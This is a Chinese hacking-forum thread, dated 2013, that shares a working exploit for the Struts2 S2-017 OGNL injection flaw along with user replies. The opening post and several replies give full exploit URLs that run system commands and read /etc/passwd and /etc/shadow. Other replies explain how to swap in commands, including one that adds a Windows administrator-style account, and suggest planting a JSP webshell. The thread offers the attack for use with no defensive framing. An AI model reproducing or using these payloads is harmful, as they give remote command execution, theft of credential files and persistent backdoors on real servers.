Struts2 s-017 Working EXP

  • A+
所属分类:lcx
http://www.example.com/struts2-showcase/employee/save.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

1#

基佬 (彩色避孕套,耐磨又耐操,用完还可以吹泡泡~) | 2013-07-17 16:11

前排留名

2#

陌路 | 2013-07-17 16:12

好像已经有人发过了

3#

DragonEgg | 2013-07-17 16:13

@陌路 那个版块木有权限阅读。。

4#

xiaogui | 2013-07-17 16:22

好人一生平安~

5#

hqdvista (...) | 2013-07-17 16:33

发个读文件的

http://xxxx/oooo.action?redirect:${%23b%3dnew java.io.FileInputStream(new java.lang.String('/etc/passwd')),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

6#

whoami (alert) | 2013-07-17 16:38

@hqdvista 发个写文件的吧...

7#

飘雪柔情 | 2013-07-17 16:42

@hqdvista 发个写文件的吧

8#

火星人 (不会技术活) | 2013-07-17 16:42

没用,早被和谐了

9#

Ocean | 2013-07-17 17:18

{'calc','goes','here'} 这里Windows下执行命令回显要怎么写??求牛人

10#

菜菜 (人,可以白手起家,但不可以手无寸铁,紧记!) | 2013-07-17 18:13

http://xxxx/oooo.action?redirect:${%23b%3dnew java.io.FileInputStream(new java.lang.String('/etc/shadow')),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

11#

TMaMba | 2013-07-17 18:16

@Ocean {'ipconfig'}

12#

菜菜 (人,可以白手起家,但不可以手无寸铁,紧记!) | 2013-07-17 18:17

root权限怎么读/etc/passwd

13#

菜菜 (人,可以白手起家,但不可以手无寸铁,紧记!) | 2013-07-17 18:19

root权限怎么读/etc/passwd

14#

咖啡 (他依然向往着长岛的雪, 依然向往着潘帕斯的风吟鸟唱) | 2013-07-17 18:19

怎么写啊

15#

中国公民 (拿shell容易,拖库难~) | 2013-07-17 18:22

@菜菜 cat /etc/passwd

16#

ccccshq (一个热爱编程,热爱网络,热爱生活的IT民工) | 2013-07-17 18:41

whoami

17#

小猪 | 2013-07-17 19:02

{'cat','/etc/passwd'} 命令在这里改 第一个参数是可执行文件(当然也可以是ls whoami id之类的命令) 从第二个开始就是传递的参数 比如 ls 你可以直接用{'ls'} 但是ls -l 有了-l这个参数 就得{'ls','-l'}这样分开写 windows的net user给个例子{'net','user','admin$','123456','/add'} 总之一句话 所有空格都给拆开写就没错了 右边感谢 谢谢

18#

FallenAngel (Crow) | 2013-07-17 19:03

空格命令拼接要用,哦

19#

TMaMba | 2013-07-17 19:05

@小猪 windows 有什么办法get shell么

20#

LauRen | 2013-07-17 19:06

,求利用工具,wb感谢

21#

小猪 | 2013-07-17 20:16

@TMaMba 参考1433抓鸡的FTP传马方法 或者直接echo一句话 只不过jsp的一句话比较长。。。

22#

dullub (专业销售变态一句话,你没有听错,998,998,只要998,超级镶钻一句话真的只要998,998,畸形一句话带回家) | 2013-07-17 20:53

- -

一边是刷rank的,一边是刷感谢的:)

23#

B1acken | 2013-07-18 07:31

尼马,感谢要钱,穷B伤不起

[原文地址]

文章来源于lcx.cc:Struts2 s-017 Working EXP

相关推荐: 【漏洞】Windows 缩略视图栈缓冲区溢出

Microsoft Windows "CreateSizedDIBSECTION()" 缩略视图栈缓冲区溢出漏洞 受影响系统:     Microsoft Windows XP Professional     Microsoft Windows Vista …

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: